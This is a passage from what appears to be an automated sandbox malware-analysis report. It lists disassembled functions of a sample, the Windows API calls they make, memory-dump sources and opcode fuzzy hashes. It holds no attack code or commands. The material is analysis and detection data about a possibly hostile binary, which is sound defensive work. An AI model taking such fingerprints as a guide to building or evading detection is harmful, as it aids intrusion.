                                                                                                                                                                  • EnterCriticalSection.KERNEL32(009AD4F0,00000000,00000000,?,0096A9A3,?,?,?,00000000,0000FDE9,?,00917B05,00000003), ref: 0096B3FD
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(009AD4F0,?,?,0096A9A3,?,?,?,00000000,0000FDE9,?,00917B05,00000003), ref: 0096B40E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                  • Opcode ID: 6b1571b69ed9cd2d1dd7f13d5b4ba2501632bfdc4107d59d1717b23d1f294fd2
                                                                                                                                                                  • Instruction ID: 5dccf7a62d4ef28dc9e7c8007e56a561660ba9a461220b7269abcd2ccb8f9cce
                                                                                                                                                                  • Opcode Fuzzy Hash: 6b1571b69ed9cd2d1dd7f13d5b4ba2501632bfdc4107d59d1717b23d1f294fd2
                                                                                                                                                                  • Instruction Fuzzy Hash: 8BD0C93370411467861027AABC089AAFEEDDEEEAB13054077FA09D21319A71EC51A6E5
                                                                                                                                                                  Function 0096C287 Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegQueryValueExW.KERNELBASE(?,?,0096D0F5,00000000,00000000,?,?,00000000,00000003,00000000,00000000,?,?,?,0096CDF4,00000000), ref: 0096C2F7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3660427363-0
                                                                                                                                                                  • Opcode ID: 18c63e8ee745e1cd5b3fe1285901022caaecbe870abd0b3c221ae592e8eef925
                                                                                                                                                                  • Instruction ID: 5f0b6bda31f21b48d2927c85efc527de15aeb4570710e1d88d180ebb6b979d8c
                                                                                                                                                                  • Opcode Fuzzy Hash: 18c63e8ee745e1cd5b3fe1285901022caaecbe870abd0b3c221ae592e8eef925
                                                                                                                                                                  • Instruction Fuzzy Hash: 6B21A2B161022AEBDB158F55CC00F7E77AAEF85700F24C066F945AB324D731ED029B90
                                                                                                                                                                  Function 0096B41C Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0096AC32: CloseHandle.KERNELBASE(FFFFFFFF,?,0096B428,00000000,00000000,?,00918106), ref: 0096AC55
                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(009AD4F0,00000000,00000000,?,00918106,00000000,?,?,?,?), ref: 0096B437
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCriticalDeleteHandleSection
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1370521891-0
                                                                                                                                                                  • Opcode ID: c7e900253eb25b0d4ec391c5f977460fa202cb7ab27698296dc8c49cb6dfa4fd
                                                                                                                                                                  • Instruction ID: d06ce6758faf143878bbe973d0505c5ab803b007b799e1fbfd808a3ecd903d1e
                                                                                                                                                                  • Opcode Fuzzy Hash: c7e900253eb25b0d4ec391c5f977460fa202cb7ab27698296dc8c49cb6dfa4fd
                                                                                                                                                                  • Instruction Fuzzy Hash: 9DF01270E26214AFC610FF65EC41D557BEDAE4BB883009016B801C6A76DB70D990EFE1
                                                                                                                                                                  Function 0097C44D Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0097C4F6: RtlAcquireSRWLockExclusive.NTDLL ref: 0097C513
                                                                                                                                                                  • DloadProtectSection.DELAYIMP ref: 0097C475
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AcquireDloadExclusiveLockProtectSection
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3680172570-0
                                                                                                                                                                  • Opcode ID: 1b0874bcb72cb6b611e9453bc7b4873819b196ef3dbca7701e848fd67a83edb7
                                                                                                                                                                  • Instruction ID: 1040c2bf13a2001dffa6006a20ab74198ad107e82f45902f20ff1ad79eb2305b
                                                                                                                                                                  • Opcode Fuzzy Hash: 1b0874bcb72cb6b611e9453bc7b4873819b196ef3dbca7701e848fd67a83edb7
                                                                                                                                                                  • Instruction Fuzzy Hash: C6D022F30141009AD229AB3488D2BB432E0FB8330AF00880CB28F8A0B0CB608040A242
                                                                                                                                                                  Function 0097C19C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C183
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 5af664989c8b9db18a3a9a03fc677111521ebf1680a1e216e531fc1d794e2f53
                                                                                                                                                                  • Instruction ID: 12a8cc413829be3ecc41b7af86a32e8ed6a897948d1c57789b52833504a7669c
                                                                                                                                                                  • Opcode Fuzzy Hash: 5af664989c8b9db18a3a9a03fc677111521ebf1680a1e216e531fc1d794e2f53
                                                                                                                                                                  • Instruction Fuzzy Hash: 3DB012D325C1026F31149104DD02F36114CC6C3F10370E42FB808C4041D5858C011073
                                                                                                                                                                  Function 0097C18C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C183
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: f1043a9392f62bca1b4a1b4a5371653a92b77646911cae0cde423b3e0aef154f
                                                                                                                                                                  • Instruction ID: 79eab79b7785e2b2c96900e001ca86ef7c96a7236d956375951283bab89e27ba
                                                                                                                                                                  • Opcode Fuzzy Hash: f1043a9392f62bca1b4a1b4a5371653a92b77646911cae0cde423b3e0aef154f
                                                                                                                                                                  • Instruction Fuzzy Hash: 87B012D329C1026F311491049C02F36114CD6C3F10370EC2FB808C4081D5848C001073
                                                                                                                                                                  Function 0097C1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: fb782de9085688bafbb483d531f7305f9a15351c426aabf55009e564928592e2
                                                                                                                                                                  • Instruction ID: 6d14f01153569fbaa2cb3de533a7c24ee32a16892bdc7ef63a163c5172f56614
                                                                                                                                                                  • Opcode Fuzzy Hash: fb782de9085688bafbb483d531f7305f9a15351c426aabf55009e564928592e2
                                                                                                                                                                  • Instruction Fuzzy Hash: 2BB012C735C102FF311411019D86E36050CD2C2F15371E42FB804C0082D4C94C400077
                                                                                                                                                                  Function 0097C1F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 191733fb3e924e793e8dca20401b7651752d7b3ec1755e7b3a7e6678050f1488
                                                                                                                                                                  • Instruction ID: a3fd4c9e37681c24891c04959aa006bfe2ead1ec93501daf46be704db030637c
                                                                                                                                                                  • Opcode Fuzzy Hash: 191733fb3e924e793e8dca20401b7651752d7b3ec1755e7b3a7e6678050f1488
                                                                                                                                                                  • Instruction Fuzzy Hash: 69B012C335C1026F311451559C02F36054CD2C2F15370E83FB418C0042D4894C440177
                                                                                                                                                                  Function 0097C16B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C183
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: af4fc94c4bcc94068f1830d10f1aa851e17d581359610a04a947d3a846d8c842
                                                                                                                                                                  • Instruction ID: 68172cec88014917e8904bca428f58157eaba5fe334e65c1704f51f2eb89de60
                                                                                                                                                                  • Opcode Fuzzy Hash: af4fc94c4bcc94068f1830d10f1aa851e17d581359610a04a947d3a846d8c842
                                                                                                                                                                  • Instruction Fuzzy Hash: 1BB012D325C102BF310451109C86D36121CC6C3F10370E82FBC04C0041D5848C400073
                                                                                                                                                                  Function 0097C296 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: f3757856783a8ca91d1470b168929d9ab822466b715705b266a8a54f1dd178a8
                                                                                                                                                                  • Instruction ID: 44178a820a8c206c616fe8db3597aff0ab84c8a442629110d64ab1509f84aa61
                                                                                                                                                                  • Opcode Fuzzy Hash: f3757856783a8ca91d1470b168929d9ab822466b715705b266a8a54f1dd178a8
                                                                                                                                                                  • Instruction Fuzzy Hash: 91B012C335C102AF311451159C42E36054CC2C2F15371E43FB808C0042D4894C440177
                                                                                                                                                                  Function 0097C286 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: ea5d5d63ecce094d4806d5664461fa2e965ffb2c54b6e535e902956c7cac6934
                                                                                                                                                                  • Instruction ID: 6c7540e6830e209e4a23580ac4b6bfc7fa40ba61bb64b3cff7918f6a933ddc32
                                                                                                                                                                  • Opcode Fuzzy Hash: ea5d5d63ecce094d4806d5664461fa2e965ffb2c54b6e535e902956c7cac6934
                                                                                                                                                                  • Instruction Fuzzy Hash: 6FB012C335D1066F311451059C02F36014CD6C2F153B0E82FB408C1042D4894C400177
                                                                                                                                                                  Function 0097C2B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 589e519f36e7cb1df3a2957b0878118915cda39dffb91c58cb4e89640e7f2b5b
                                                                                                                                                                  • Instruction ID: c09931adf22ff769c4ec09ed0619148cd4eb3bea3775d8ba8c4aaac08f936338
                                                                                                                                                                  • Opcode Fuzzy Hash: 589e519f36e7cb1df3a2957b0878118915cda39dffb91c58cb4e89640e7f2b5b
                                                                                                                                                                  • Instruction Fuzzy Hash: 62B012C335C1026F311451159D42E36054CC2C2F15370E43FB408C0042D48A4C4501B7
                                                                                                                                                                  Function 0097C2A6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 81b59257671183f6cbdd9acc4c33e0cbe51e743cccef409ab72376acfe281598
                                                                                                                                                                  • Instruction ID: 994165620ba5e76ebafd7151503cc8d5c580ba68f4d93993faafddb8e42ec1e4
                                                                                                                                                                  • Opcode Fuzzy Hash: 81b59257671183f6cbdd9acc4c33e0cbe51e743cccef409ab72376acfe281598
                                                                                                                                                                  • Instruction Fuzzy Hash: 6AB012C335C2026F321451159C02E37094CC2C2F15370E53FB408C0142D48A4C880177
                                                                                                                                                                  Function 0097C2D6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: febdfad0601dcec197a4beb5d8cad55dc2ee9715b3578581c8b442263b24910e
